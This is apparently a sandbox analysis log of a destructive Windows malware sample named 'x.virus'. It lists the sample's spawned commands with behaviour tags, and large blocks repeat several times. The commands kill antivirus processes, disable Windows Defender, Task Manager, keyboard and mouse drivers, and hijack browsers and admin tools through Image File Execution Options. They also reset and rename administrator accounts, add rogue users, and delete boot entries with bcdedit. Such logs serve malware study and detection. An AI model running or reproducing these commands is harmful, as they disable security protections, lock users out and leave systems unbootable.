C:\Windows\System32\taskkill.exetaskkill /F /IM ccc*2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM npfmn*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM loge*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM nisum*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM issvc*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM tmp*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM tmn*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM pcc*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM cpd*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM pop*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM pav*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM padmin*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM panda*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM avsch*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM sche*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM syman*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM virus*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM realm*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM sweep*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM scan*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM ad-*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM safe*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM avas*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM norm*2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /F /IM offg*2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Task Manager && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Control Panel && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Registry Editor && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Notepad && pause && exit" /f2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im SearchUI.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im taskmgr.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell_ise.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\net.exenet user Admin hackedbyxvirus178702⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin hackedbyxvirus178703⤵
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic useraccount where name="Admin" rename "hackedbyxvirus31096"2⤵
-
-
C:\Windows\System32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\bcdedit.exebcdedit /delete {current} /f2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\cmd.execmd /k "mshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();" && exit"2⤵
-
C:\Windows\System32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();"3⤵
-
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Task Manager && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Control Panel && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Registry Editor && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Notepad && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\net.exenet user hackedbyxvirus22252 /add /random /passwordchg:yes2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user hackedbyxvirus22252 /add /random /passwordchg:yes3⤵
-
-
-
C:\Windows\System32\net.exenet user administrator /active:no2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active:no3⤵
-
-
-
C:\Windows\explorer.exeexplorer2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im SearchUI.exe2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /f /IM explorer.exe2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\curl.execurl ascii.live/nyan2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/rick2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/dvd2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
-
C:\Windows\System32\curl.execurl parrot.live2⤵
-
-
C:\Windows\System32\winver.exewinver2⤵
-
-
C:\Windows\System32\wscript.exewscript2⤵
-
-
C:\Windows\System32\cleanmgr.execleanmgr2⤵
- Enumerates connected drives
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\certmgr.msc"2⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Windows\System32\cmd.execmd2⤵
-
-
C:\Windows\System32\calc.execalc2⤵
-
-
C:\Windows\hh.exehh2⤵
-
-
C:\Windows\System32\dxdiag.exedxdiag2⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\iexpress.exeiexpress2⤵
-
-
C:\Windows\System32\help.exehelp2⤵
-
-
C:\Windows\HelpPane.exehelppane2⤵
-
-
C:\Windows\winhlp32.exewinhlp322⤵
-
-
C:\Windows\bfsvc.exebfsvc2⤵
-
-
C:\Windows\System32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\bcdedit.exebcdedit /delete {current} /f2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\cmd.execmd /k "mshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();" && exit"2⤵
-
C:\Windows\System32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();"3⤵
-
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "HideFastUserSwitching" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Chrome && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msedge.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Edge && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Firefox && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\opera.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Opera && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brave.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Brave && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Internet Explorer && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell_ise.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for PowerShell ISE && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Task Manager && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Control Panel && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Registry Editor && pause && exit" /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d "cmd /k echo Access denied for Notepad && pause && exit" /f2⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\System32\net.exenet user hackedbyxvirus27560 /add /random /passwordchg:yes2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user hackedbyxvirus27560 /add /random /passwordchg:yes3⤵
-
-
-
C:\Windows\System32\net.exenet user administrator /active:no2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active:no3⤵
-
-
-
C:\Windows\explorer.exeexplorer2⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of SendNotifyMessage
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im SearchUI.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\taskkill.exetaskkill /f /IM explorer.exe2⤵
-
-
C:\Windows\System32\taskkill.exetaskkill /f /im powershell.exe2⤵
- Kills process with taskkill
-
-
C:\Windows\System32\curl.execurl ascii.live/nyan2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/rick2⤵
-
-
C:\Windows\System32\curl.execurl ascii.live/dvd2⤵
-
-
C:\Windows\System32\curl.execurl parrot.live2⤵
-
-
C:\Windows\System32\winver.exewinver2⤵
-
-
C:\Windows\System32\wscript.exewscript2⤵
-
-
C:\Windows\System32\cleanmgr.execleanmgr2⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\System32\certmgr.msc"2⤵
- Drops file in System32 directory
- Suspicious behavior: SetClipboardViewer
-
-
C:\Windows\System32\cmd.execmd2⤵
-
-
C:\Windows\System32\calc.execalc2⤵
-
-
C:\Windows\hh.exehh2⤵
-
-
C:\Windows\System32\dxdiag.exedxdiag2⤵
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\iexpress.exeiexpress2⤵
-
-
C:\Windows\System32\help.exehelp2⤵
-
-
C:\Windows\HelpPane.exehelppane2⤵
-
-
C:\Windows\winhlp32.exewinhlp322⤵
-
-
C:\Windows\bfsvc.exebfsvc2⤵
-
-
C:\Windows\System32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\bcdedit.exebcdedit /delete {current} /f2⤵
- Modifies boot configuration data using bcdedit
-
-
C:\Windows\System32\cmd.execmd /k "mshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();" && exit"2⤵
-
C:\Windows\System32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell');var result=sh.Popup('still using this computer?',10,'x.virus',36);close();"3⤵
-
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Mouclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKLM\System\CurrentControlSet\Services\Kbdclass/v Start /t REG_DWORD /d4/f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
-
-
C:\Windows\System32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Security Center" /v AntiVirusOverride /t REG_DWORD /d 1 /f2⤵
- Windows security bypass
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v BingSearchEnabled /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v CortanaConsent /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v AllowCortana /t REG_DWORD /d 0 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f2⤵
-
-
C:\Windows\System32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoWinKeys /t REG_DWORD /d 1 /f2⤵
-
-
